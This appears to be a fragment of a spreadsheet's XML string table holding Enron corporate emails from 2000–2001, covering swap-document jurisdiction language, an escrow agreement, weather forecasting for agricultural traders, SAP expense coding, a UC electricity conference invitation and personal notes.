  <si>
    <t xml:space="preserve">Jeff:_x000D_
Thanks for your message.  I would make sure that Nora and/or Scott are okay _x000D_
generally with the concept of submission to jurisdiction._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
_x000D_
_x000D_
_x000D_
	"Eldredge, Jeff" &lt;jeldredge@velaw.com&gt;_x000D_
	05/30/2000 09:53 AM_x000D_
		 _x000D_
		 To: "St. Clair, Carol (Enron)" &lt;carol.st.clair@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: Latest Swap Docs_x000D_
_x000D_
_x000D_
Carol:_x000D_
_x000D_
 We're still trying for the Enron preferred route of not submitting_x000D_
to jurisdiction, but somehow the new language slipped in anyway.  If it does_x000D_
have to stay, I'll double check to make sure it is the language that Enron_x000D_
accepts when forced to submit to jurisdiction in NY.  I believe it is._x000D_
_x000D_
Jeffrey E. Eldredge_x000D_
Vinson &amp; Elkins L.L.P._x000D_
Regis House_x000D_
45 King William Street_x000D_
London EC4R  9AN_x000D_
Office Tel: (44-171) 618-6013_x000D_
Fax: (44-171) 618-6001_x000D_
Mobile Tel: (44) 0411 435 486_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Carol St Clair [mailto:Carol.St.Clair@enron.com]_x000D_
Sent: 30 May 2000 15:21_x000D_
To: jeldredge@velaw.com_x000D_
Cc: Mark Evans; Nora Dobin_x000D_
Subject: Latest Swap Docs_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff:_x000D_
I am assuming that someone on the Enron Corp. side has signed off on the new_x000D_
"jurisdiction" language that has now been inserted into the swap assignment_x000D_
and_x000D_
schedule as this language is a fairly radical change from what we had in_x000D_
there_x000D_
before.  Please confirm._x000D_
Carol_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 09:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: Escrow Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Glad I gave you such a GLOWING review._x000D_
_x000D_
_x000D_
From: Kathleen Carnahan/ENRON@enronXgate on 05/24/2001 04:17 PM_x000D_
To: Kay Mann/Corp/Enron@Enron, Chris Booth/ENRON@enronXgate_x000D_
cc:  _x000D_
_x000D_
Subject: RE: FW: Escrow Agreement_x000D_
_x000D_
I am printing the Fee Agreement right now.  It is my understanding Marisa _x000D_
Reuter is reviewing the Escrow Agreement, so I plan on calling her tomorrow _x000D_
for her comments.  Then, the plan is to find out how many need to be executed _x000D_
and get the ink._x000D_
_x000D_
Also, I am revising the Incumbency Certificate right now to be signed by _x000D_
Duran, Presto and Tricoli.  Kay, I will bring for your initials in a few _x000D_
minutes._x000D_
_x000D_
K-_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Thursday, May 24, 2001 4:15 PM_x000D_
To: Booth, Chris_x000D_
Cc: Carnahan, Kathleen_x000D_
Subject: Re: FW: Escrow Agreement_x000D_
_x000D_
I've volunteered Kathleen to help process the paper.  _x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
From: Chris Booth/ENRON@enronXgate on 05/24/2001 02:12 PM_x000D_
To: Kay Mann/Corp/Enron@Enron, Ben Jacoby/ENRON@enronXgate_x000D_
cc:  _x000D_
_x000D_
Subject: FW: Escrow Agreement_x000D_
_x000D_
FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  "Young, Michael" &lt;Michael.Young@northwestern.com&gt;@ENRON _x000D_
[mailto:IMCEANOTES-+22Young+2C+20Michael+22+20+3CMichael+2EYoung+40northwester_x000D_
n+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent: Thursday, May 24, 2001 1:56 PM_x000D_
To: Booth, Chris_x000D_
Cc: 'margueritekahn@paulhastings.com'_x000D_
Subject: Escrow Agreement_x000D_
_x000D_
Chris, per our conversation this afternoon, this e-mail will document the_x000D_
fact that, due to travel schedules, NorthWestern is unable to obtain the_x000D_
necessary officer signatures for the incumbency documents requested by_x000D_
Citibank as part of establishing the escrow arrangement called for under the_x000D_
Letter Agreement.  You agreed that NorthWestern could complete the necessary_x000D_
paperwork with Citibank on Tuesday of next week.  Thanks again for your_x000D_
flexibility._x000D_
_x000D_
Michael J. Young_x000D_
Senior Corporate Counsel_x000D_
NorthWestern Corporation_x000D_
125 S. Dakota Avenue_x000D_
Sioux Falls, SD  57104_x000D_
Fax:  605/978-2840_x000D_
Phone:  605/978-2836_x000D_
Cell:  605/351-4040_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 22:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>London Update</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
Vince,_x000D_
_x000D_
more fuel for our discussion with John Sheriff today,_x000D_
_x000D_
Mike_x000D_
---------------------- Forwarded by Mike A Roberts/HOU/ECT on 04/25/2001 _x000D_
05:44 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Stephen Bennett @ ENRON                           04/25/2001 04:05 AM_x000D_
	_x000D_
_x000D_
To: Jose Marquez/Corp/Enron@ENRON, Mike A Roberts/HOU/ECT_x000D_
cc: Tony Hamilton/EU/Enron@Enron _x000D_
Subject: Softs (Ag) Support_x000D_
_x000D_
Hi Guys,_x000D_
_x000D_
I thought I would quickly update you on a few meetings we've had with the ag _x000D_
folks here over the past 2 days.  They are extremely interested in weather _x000D_
support and appear to be our most enthusiastic customer group to date.  A _x000D_
summary:_x000D_
_x000D_
1) They are interested in Cocoa, Coffee and Sugar.  Specifically:_x000D_
 Brazil:  Londrina, Bauru, Lavras   (All WMOs available in Accuweather)_x000D_
 Vietnam:  Kentum, Dalat (No data immediately evident)_x000D_
 Ivory Coast:  Man, Gagnoa (WMOs in Accuwx)_x000D_
 Indonesia:  Sumatra-Kotubumi, Sulawesi-Dolo (No data immediately evident)_x000D_
_x000D_
2) They are specifically interested in event spikes - extreme temperature, _x000D_
precipitation or wind.  They are also interested in any trend information we _x000D_
can devise.  Links between ENSO or other large scale oscillations that could _x000D_
have long range effects.  Tony has already given their group a 101 course on _x000D_
ENSO and its impacts on these areas._x000D_
_x000D_
3) They would eventually like daily AM briefings - along with a daily product _x000D_
related to their market (ie precip/temp graphs etc)_x000D_
_x000D_
4) They do not begin actually trading for another 6 to 8 weeks - so we have _x000D_
some time to experiment with the type of support that fits them best._x000D_
_x000D_
Tony and I agree that we would like to brainstorm this a bit with you guys to _x000D_
see what exactly can be produced daily - as efficiently as possible.  We _x000D_
should be able to add any lat/long points we want to the list of _x000D_
international cities streaming through from the MRF/AVN/ECMWF from EarthSat.  _x000D_
The problems here would be the models' problems handling tropical weather _x000D_
along with specific local effects - especially in Indonesia._x000D_
_x000D_
Let's talk about this at some point and get our thoughts together._x000D_
_x000D_
Steve_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 10:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tsurak@socalgas.com', 'rick.counihan@greenmountain.com', 'bdingwall@unitedgas.com', 'wreed@sempra.com', 'jteeter@sdge.com', 'paulamirault@aec.ca', 'rfoss@coral-energy.com', 'jharrigan@socalgas.com', 'dbarker@socalgas.com', 'jhay@sempra.com', 'rochmanm@cubjpa.org', 'bcherry@sempra.com', 'jmpa@dynegy.com', 'susan.scott@enron.com', 'kfreeman@sempra.com', 'rmorrow@socalgas.com', 'rochmanm@spurr.org', 'jmumford@socalgas.com', 'gtom@socalgas.com', 'nmcvay@socalgas.com', 'johnj@bcjlaw.com', 'lschavrien@sempra.com', 'efong@sdge.com', 'porterdk@sce.com', 'kmccrea@sablaw.com', 'chj@aelaw.com', 'ascott@sdge.com', 'dfollett@sempra.com', 'plg@cpuc.ca.gov', 'burkee@cts.com', 'tbrill@sempra.com', 'etakemura@socalgas.com', 'rmp@cpuc.ca.gov', 'alexanms@sce.com', 'johnson_pamela@lacoe.edu', 'llorenz@socalgas.com', 'gwright@sempra.com', 'ack@aelaw.com', 'mgaines@socalgas.com', 'dbisi@socalgas.com', 'craigc@calpine.com', 'enelson@socalgas.com', 'lindseyhowdowning@dwt.com', 'bsl@cpuc.ca.gov', 'jleslie@luce.com', 'rpurves@sdge.com', 'asmith@sempra.com', 'tp2jxv@socalgas.com', 'jdasovic@enron.com', 'rbetonte@socalgas.com', 'ljhubbard@sempra.com', 'redavis@sempra.com', 'karpjos@sf.whitecase.com', 'wsakarias@sdge.com', 'swatson@socalgas.com', 'mday@gmssr.com', 'gsullivan@sempra.com', 'jfawcet@enron.com', 'douglass@arterhadden.com', 'jsuwara@sempra.com', 'eke@aelaw.com', 'david.bayless@utility.com'})</t>
  </si>
  <si>
    <t>Re: Tom Beach's Prepared Rebuttal Testimony</t>
  </si>
  <si>
    <t>Attached please find Word and Wordperfect versions of Tom  Beach's draft _x000D_
rebuttal testimony in the Gas OIR proceeding, on behalf of the  Indicated _x000D_
Electric Generators._x000D_
I look forward to comments from any of the supporters of the  Comprehensive _x000D_
Settlement._x000D_
?_x000D_
Tom Beach_x000D_
 - EG Rebuttal Testimony on GIR Settlement.doc_x000D_
 - EG Rebuttal Testimony on GIR Settlement.wpd</t>
  </si>
  <si>
    <t>Thu, 15 Jun 2000 04:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Re[4]: Tonight</t>
  </si>
  <si>
    <t>i will only say it is our party if it is fun.  if it sucks it is all you.    _x000D_
i am not going out tonight.  game is on at 8:30 and i will just watch it at _x000D_
home.  i need my beauty sleep before the cruise.  my security guard _x000D_
girlfriend doesn't have an email address (she doesn't have a computer), but _x000D_
she does have an instant message pager.  you should try to buy some new cd's _x000D_
before your party.</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 04:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'christine.stokes@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'kevin.hyatt@enron.com', 'audrey.robertson@enron.com', 'bob.burleson@enron.com', 'jeffery.fawcett@enron.com', 'michelle.lokay@enron.com', 'steven.harris@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>SAP Coding Quick Reference for ET&amp;S Home Office</t>
  </si>
  <si>
    <t xml:space="preserve">Per our discussions in staff meeting, please find attached below a "cheat _x000D_
sheet" for the new account codings.  I suggest you save for future references._x000D_
_x000D_
adr_x000D_
---------------------- Forwarded by Audrey Robertson/ET&amp;S/Enron on 06/27/2000 _x000D_
11:14 AM ---------------------------_x000D_
_x000D_
_x000D_
Allison Millan_x000D_
06/23/2000 02:45 PM_x000D_
To: Virginia O'Neill/ET&amp;S/Enron@Enron, Audrey Robertson/ET&amp;S/Enron@ENRON, _x000D_
Martha Benner/ET&amp;S/Enron@ENRON, Julie McCoy/ET&amp;S/Enron@ENRON, Sharon _x000D_
Solon/ET&amp;S/Enron@ENRON, Judy Kudym/ET&amp;S/Enron@ENRON, Deb _x000D_
Cappiello/ET&amp;S/Enron@ENRON, Ricki Winters/ET&amp;S/Enron@Enron, Rosemary _x000D_
Gracey/ET&amp;S/Enron@ENRON, Linda Wehring/ET&amp;S/Enron@ENRON, Lindy _x000D_
Donoho/ET&amp;S/Enron@ENRON, Dana Jones/ET&amp;S/Enron@ENRON, Tim _x000D_
Kissner/ET&amp;S/Enron@ENRON, Richard Hanagriff/ET&amp;S/Enron@ENRON, Bob _x000D_
Chandler/ET&amp;S/Enron@ENRON, Hoyt Ivey/ET&amp;S/Enron@ENRON, Allen _x000D_
Joe/ET&amp;S/Enron@ENRON, Harry Walters/ET&amp;S/Enron@ENRON, Dan _x000D_
Fancler/ET&amp;S/Enron@ENRON, Carolyn Henry/ET&amp;S/Enron@ENRON, Debbie _x000D_
Moseley/ET&amp;S/Enron@ENRON, Katherine Gibson/ET&amp;S/Enron@ENRON, Kasey _x000D_
Davis/ET&amp;S/Enron@ENRON, Dawn Clennon/ET&amp;S/Enron@ENRON, Robert _x000D_
Miller/ET&amp;S/Enron@ENRON, Dan Santellan/ET&amp;S/Enron@ENRON, Je _x000D_
Chang/ET&amp;S/Enron@ENRON, Aurora Dimacali/ET&amp;S/Enron@ENRON, Vera _x000D_
Apodaca/ET&amp;S/Enron@ENRON, Henry Baker/ET&amp;S/Enron@ENRON, Rene _x000D_
Bickerstaff/ET&amp;S/Enron@ENRON, Ann Carethers/ET&amp;S/Enron@ENRON, James _x000D_
Centilli/ET&amp;S/Enron@ENRON, Elaine Concklin/ET&amp;S/Enron@ENRON, Maria _x000D_
Perales/ET&amp;S/Enron@ENRON, Maria Y Gonzalez/ET&amp;S/Enron@ENRON, Steve _x000D_
Kleb/ET&amp;S/Enron@ENRON, Sophie Patel/ET&amp;S/Enron@ENRON, Vincent _x000D_
Strohmeyer/ET&amp;S/Enron@ENRON, Dave Waymire/ET&amp;S/Enron@ENRON, Gary _x000D_
Zahn/ET&amp;S/Enron@ENRON, Sharon Brown/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: SAP Coding Quick Reference for ET&amp;S Home Office_x000D_
_x000D_
Attached is a coding quick reference sheet (Coding.QuickRef.xls) that I hope _x000D_
will be useful in the coding of expense reports and miscellaneous vendor _x000D_
invoices that may pass your desk.  I have also attached a copy of the "GPG _x000D_
SAP Coding Block" (Coding.doc) which explains the different SAP coding block _x000D_
requirements.  SAP coding must now be used in order to process expense _x000D_
reports and vendor invoices.  If you need additional coding information, _x000D_
please contact one of the following ET&amp;S General Accountants in Houston:_x000D_
 _x000D_
      _x000D_
_x000D_
If I have left anyone off of the distribution list that you think may benefit _x000D_
from these coding aids, please forward this note to them.  Also, if you have _x000D_
any suggestions or comments to add or subtract (or correct) information that _x000D_
may make the coding quick reference sheet easier to use, please let me know. _x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Allison_x000D_
x-35568_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 08:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: My AOL.COM News Futures Agency Says IntercontinentalExchange_x000D_
 Free From Rules</t>
  </si>
  <si>
    <t>FYI._x000D_
   This is the Bloomberg article, as requested._x000D_
_x000D_
Regards,_x000D_
_x000D_
Dorien_x000D_
 http://my.aol.com/business/story.tmpl?table=n&amp;cat=02&amp;id=0005150422766042_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------_x000D_
_x000D_
This e-mail is sent by a law firm and contains information_x000D_
that may be privileged and confidential. If you are not the_x000D_
intended recipient, please delete the e-mail and notify us_x000D_
immediately._x000D_
_x000D_
 - My AOL.COM News Futures Agency Says IntercontinentalExchange F</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 07:18:12 -0800 (PST)</t>
  </si>
  <si>
    <t>monday</t>
  </si>
  <si>
    <t>if i come down to houston monday, can we get together after work monday?  there are a couple of things we should talk about that would be easier outside (&amp; w/beer).</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 09:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAREER CHANGERS SEMINAR 6/9 or 6/16</t>
  </si>
  <si>
    <t xml:space="preserve">?CAREER CHANGERS SEMINAR: (May 01 grads. are welcome to attend) a seminar for _x000D_
individuals considering transitioning into a different line of work.? We will _x000D_
focus on how to leverage transferrable ability, skills and knowledge into a _x000D_
different career path.? This seminar will be on a Saturday in June, _x000D_
tentatively either 6/9 or 6/16 from 10 to 3.? If you are interested in _x000D_
attending please send me an email, letting me know your preference as far as _x000D_
a date.? We will hold the seminar on the date with that has greatest _x000D_
preference. ? If you have not sent me an email and want to attend please _x000D_
reply and let me know if you have a date preference. </t>
  </si>
  <si>
    <t>Thu, 20 Jul 2000 01:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Request for visit and meeting</t>
  </si>
  <si>
    <t xml:space="preserve">These guys are looking to come in the first few weeks of August.  What is _x000D_
your availability?_x000D_
_x000D_
Grant._x000D_
---------------------- Forwarded by Grant Masson/HOU/ECT on 07/20/2000 08:18 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Carlos Eduardo Machado@ENRON_DEVELOPMENT_x000D_
07/18/2000 06:28 PM_x000D_
To: Grant Masson@ECT_x000D_
cc: Gabriel Sanchez-Sierra/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Request for visit and meeting_x000D_
_x000D_
Hi Grant, we met briefly a couple of months ago. I work with Pedro in the _x000D_
Colombia office. We are working closely with Ecopetrol (Colombia's _x000D_
state-owned oil company) on a very important deal, and some of their highest _x000D_
ranking officials (3 of them) will like to visit our head quarters in early _x000D_
August, to share some ideas on risk management tools (very general concepts _x000D_
that can obviously be disclosed). _x000D_
_x000D_
My assumption is that Vince and your-self are the perfect people to have the _x000D_
meeting with. Several consulting firms have advice Ecopetrol to get in touch _x000D_
with Enron when referring to advance risk management techniques. Do you think _x000D_
this is possible? Please let me know, this means a great deal for this _x000D_
office, but I also know you guys are extremely busy. Thanks,_x000D_
_x000D_
Carlos E_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 19:26:42 -0800 (PST)</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 03:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: MGMT 656</t>
  </si>
  <si>
    <t xml:space="preserve">Pam_x000D_
_x000D_
Thanks_x000D_
_x000D_
Yes, please, send me the E-mail addresses._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Pamela Vande Krol Castro &lt;castro@rice.edu&gt; on 01/26/2001 10:40:17 AM_x000D_
To: Vince.J.Kaminski@enron.com_x000D_
cc:  _x000D_
Subject: MGMT 656_x000D_
_x000D_
_x000D_
Here are your latest rosters. Let me know if you would like the spreadsheet _x000D_
with their e-mail addresses as well! - Pam (6223) _x000D_
 - 656.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Apr 2001 06:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Lockridge Remediation Site</t>
  </si>
  <si>
    <t xml:space="preserve">Larry-_x000D_
Remediation efforts to remove PSH have gone well recently and it is now time _x000D_
to focus more attention toward remediation of the dissolved phase plume. This _x000D_
is reflected in the proposed scope._x000D_
_x000D_
Two files are attached. The first file includes a project scope and cost _x000D_
estimate for 2001. The second file contains photos of the site. _x000D_
_x000D_
The cost estimate is $93,000. This figure includes only contract installation _x000D_
dollars, so the work order amount would be about 20-30% more than this. The _x000D_
bulk of this figure ($53,000) is for system modifications to focus more _x000D_
attention toward remediation of the dissolved phase plume. _x000D_
_x000D_
If you get a chance to look at the photos, be sure to look at the last photo. _x000D_
This photo shows the interior of the SVE knockout box that was installed in _x000D_
Dec 1999 in the NE pit area. This installation has worked very well over the _x000D_
past two winter periods and has greatly increased the effectiveness of the _x000D_
SVE system. The SVE knockout box recently installed at the N Crawar site is _x000D_
nearly identical. _x000D_
_x000D_
Give me a call and lets discuss._x000D_
_x000D_
-George_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 06:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Confidentiality Agreement List</t>
  </si>
  <si>
    <t>Tana:_x000D_
_x000D_
FYI, covered entities for Buckaroo NDA will include EBS, ENA, ENW, EOL and _x000D_
Enron Corp._x000D_
_x000D_
Leslie</t>
  </si>
  <si>
    <t>Fri, 6 Oct 2000 03:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Nov. 13 UC summit conference on electricity</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Jeff. I really hope that he agrees. I would think Enron would surely_x000D_
want to be represented and to make sure its viewpoints are aired, and I know_x000D_
everyone else feels it is important to learn from this. I just learned that_x000D_
John Fielder, SCE's Senior Vice President for Regulatory Policy and Affairs,_x000D_
is confirmed as a panelist._x000D_
_x000D_
We are awaiting word from you on the sponsorship, and won't say anything_x000D_
until you can tell us what._x000D_
_x000D_
Best,_x000D_
Lee_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Friday, October 06, 2000 10:10 AM_x000D_
To: Lee S. Friedman_x000D_
Cc: jdasovic@enron.com; tim.belden@enron.com_x000D_
Subject: Re: Nov. 13 UC summit conference on electricity_x000D_
_x000D_
_x000D_
_x000D_
Lee:  I'm not certain that it will be possible to get Skilling, but I'll_x000D_
get back to you soon.  Also, I want to manage expectations a bit about the_x000D_
possibility of having Enron stream the conference.  Just don't want us to_x000D_
get ahead of ourselves.  I'd prefer that it not go out in any announcement_x000D_
at this juncture.  Thanks a bunch._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
"Lee S. Friedman"_x000D_
&lt;lfried@uclink4.ber        To:     "Tim Belden"_x000D_
&lt;tim.belden@enron.com&gt;, "Jeff Dasovich"_x000D_
keley.edu&gt;                 &lt;jdasovic@enron.com&gt;_x000D_
cc:_x000D_
10/04/2000 05:52 PM        Subject:     Nov. 13 UC_x000D_
summit conference on electricity_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff and Tim,_x000D_
_x000D_
Tim, I know Jeff knows all about the conference we are organizing and I_x000D_
hope_x000D_
you do as well._x000D_
_x000D_
Rob, I and the rest of the conference organizers are wondering if you could_x000D_
help us find out if Jeff Skilling from Enron would be willing to be one of_x000D_
our panelists? He has been an articulate critic of the current state of our_x000D_
electricity markets, and we definitely would like the genco perspective_x000D_
represented._x000D_
_x000D_
Naturally we are hoping to get a quick answer because our publicity about_x000D_
the conference will be going out shortly._x000D_
_x000D_
A brief description of the conference is appended below. Please let me know_x000D_
if you need any additional information._x000D_
_x000D_
Thanks very much for your help and advice._x000D_
Lee_x000D_
_x000D_
The summer of San Diego has prompted the School, in collaboration with UC's_x000D_
Energy Institute and Competition Policy Center, to sponsor a high-level_x000D_
summit conference on electricity deregulation. The focus, and the audience,_x000D_
will be national, but heavily informed and influenced by the California_x000D_
crisis.  The conference will evaluate (1) the wisdom of deregulation and_x000D_
(2)_x000D_
how the pitfalls encountered so far can be avoided and remedied. The_x000D_
University will facilitate an open, honest and reasoned exchange between_x000D_
executive-level players from various perspectives: industry, regulators,_x000D_
consumers, legislators, academics, and market and system operators._x000D_
_x000D_
The format entails two roundtable discussions with six speakers and a_x000D_
moderator.  During the panel sessions, the speakers will engage in a_x000D_
debate/dialogue on the current situation in electricity deregulation, where_x000D_
we have come from, what the future holds, and what solutions lie on the_x000D_
horizon. Each speaker will have uninterrupted time to speak, followed by_x000D_
Q&amp;A_x000D_
and discussion.  We expect a live audience of about 200, including a large_x000D_
press presence.  One sponsor has tentatively offered to provide internet_x000D_
streaming video services.  We hope to have a balanced group of sponsors_x000D_
ranging from the American Public Power Association to energy companies._x000D_
_x000D_
The speakers are being arranged at this time. We have commitments from:_x000D_
Loretta Lynch (Chair, CPUC), and PJM CEO Phil Harris. We have a preliminary_x000D_
acceptance from Steven Littlechild (England's former primary electricity_x000D_
regulator) and Laura Tyson (former Chair, President's Council of Economic_x000D_
Advisors and National Economic Council, currently Dean, Haas School of_x000D_
Business). We have invited FERC Commissioner Curt Hebert, and U.S._x000D_
Representative Edward_x000D_
Markey, executive-level managers from several energy companies and state_x000D_
legislators. Former DOJ chief economist Carl Shapiro will be on one of the_x000D_
panels, as will economist Severin Borenstein, Director of UCEI and_x000D_
Professor_x000D_
of Business and Public Policy. Michael Florio from The Utility Reform_x000D_
Network (TURN) will be a consumer advocate on one of the panels. Lee_x000D_
Friedman, economist and Professor of Public Policy, will briefly provide an_x000D_
introduction to the panel discussions with his talk "Lighting the Stage:_x000D_
The_x000D_
Electricity of Deregulation."_x000D_
_x000D_
A dinner for the panelists and organizers will be hosted at UC's Goldman_x000D_
School of Public Policy following the conference proceedings. We have_x000D_
reserved rooms for our speakers at Berkeley's landmark Claremont Hotel. We_x000D_
can reimburse those speakers who request it for coach airfare expenses and_x000D_
other ordinary local expenses._x000D_
_x000D_
Forfurther information, please contact:_x000D_
Lee S. Friedman_x000D_
Professor of Public Policy_x000D_
Goldman School of Public Policy_x000D_
University of California_x000D_
2607 Hearst Avenue_x000D_
Berkeley, CA 94720-7320_x000D_
Ph:  (510) 642-7513_x000D_
Fax: (510) 643-9657_x000D_
email: lfried@uclink4.berkeley.edu_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 00:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>crude &amp; brent continuation charts as hot links 4/25</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  , 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
_x000D_
Crude Close Only Continuation    http://www.carrfut.com/research/Energy1/CL_x000D_
Close only.pdf_x000D_
Brent Close Only Continuation_x000D_
http://www.carrfut.com/research/Energy1/QO Close only.pdf_x000D_
Crude Continuation     http://www.carrfut.com/research/Energy1/cl.pdf_x000D_
Brent Continuation     http://www.carrfut.com/research/Energy1/QO.pdf_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Carr Futures_x000D_
150 S. Wacker Dr., Suite 1500_x000D_
Chicago, IL 60606  USA_x000D_
Tel:  312-368-6149_x000D_
Fax:  312-368-2281_x000D_
soblander@carrfut.com_x000D_
http://www.carrfut.com</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 01:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kskilling@ehshouston.org'})</t>
  </si>
  <si>
    <t>Lunch today</t>
  </si>
  <si>
    <t>Hi, Kristin,_x000D_
_x000D_
Your Dad asked me to let you know that he got your message.  He would like to _x000D_
meet you at Maggiones (the place you two met for lunch the first time).  I'm _x000D_
making a reservation for you guys in his name at 1:00 p.m. _x000D_
_x000D_
Would you please reply to this e-mail so I know you got it?  Thanks, Kristin, _x000D_
and have a nice lunch._x000D_
_x000D_
Sherri</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 04:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">It was great to run into you, too. This shrinking world never ceases to amaze _x000D_
me......to end up working in the same building, different industry, over a _x000D_
year later? Crazy. So, on lunch or a beer after work, just let me know the _x000D_
time and place. Lunch is a rarity with me, but I love to have an excuse to _x000D_
breathe fresh air in the middle of the day. And I need to plan ahead as well. _x000D_
I'll keep the week of the 22nd open - sound good?_x000D_
_x000D_
Talk to you soon._x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Enders &lt;jenders@ap.org&gt; on 04/11/2001 08:59:19 AM_x000D_
To: kate.symes@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: hey_x000D_
_x000D_
_x000D_
Kate: It was great to run into you. I'm glad you've found something_x000D_
interesting to do in Portland._x000D_
I'm up to my ass organizing the state AP broadcasters convention at_x000D_
Sunriver the weekend of the 21st._x000D_
After that, lets plan to have lunch, or maybe a beer after work. As I_x000D_
said, I come in early and leave at_x000D_
about 3:30 each day. Lunches are possible, but I need to plan ahead._x000D_
Again, good to see ya._x000D_
John_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 14 Oct 2001 23:06:59 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OnePass Elite Member,_x000D_
_x000D_
Continental Airlines is pleased to advise you that you have been upgraded_x000D_
to First Class on your upcoming flight due to your OnePass Elite_x000D_
Membership._x000D_
_x000D_
  Confirmation:    VYVNKX_x000D_
  Flight Number:   1416_x000D_
  Date:            October 18, 2001_x000D_
  Origination:     IAH_x000D_
  Destination:     MSP_x000D_
  Seat:            01A*_x000D_
_x000D_
This e-mail notice does not replace the need to check-in for the flight._x000D_
Recommended check-in time is 2 hours prior to departure for domestic_x000D_
flights.  If you do not check in at least 20 minutes prior to departure_x000D_
your seat can be given away._x000D_
_x000D_
---------------------------------------------------------------------_x000D_
_x000D_
PLEASE DO NOT REPLY TO THIS E-MAIL.  UNFORTUNATELY E-MAIL SENT TO THIS_x000D_
ADDRESS CANNOT BE ANSWERED.  PLEASE DIRECT ALL INQUIRIES TO THE ELITE_x000D_
PRIORITY LINE, WHICH CAN BE FOUND ON YOUR ELITE CARD._x000D_
_x000D_
To make changes to your e-mail address, access the Your Account area of_x000D_
the OnePass site (http://www.onepass.com/asp/youraccount.asp) or contact_x000D_
the OnePass Service Center as (713) 952-1630._x000D_
_x000D_
For changes to your itinerary, contact your Travel Agent or Continental_x000D_
Reservations at 1-800-525-0280 (Domestic) or 1-800-231-0856_x000D_
(International)._x000D_
_x000D_
To unsubscribe from OnePass Elite upgrade e-mail notification, please_x000D_
visit http://onepass.continental.com/emailupgrades_x000D_
_x000D_
Thank you for choosing Continental Airlines._x000D_
</t>
  </si>
  <si>
    <t>Mon, 3 Dec 2001 04:17:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.january@enron.com'})</t>
  </si>
  <si>
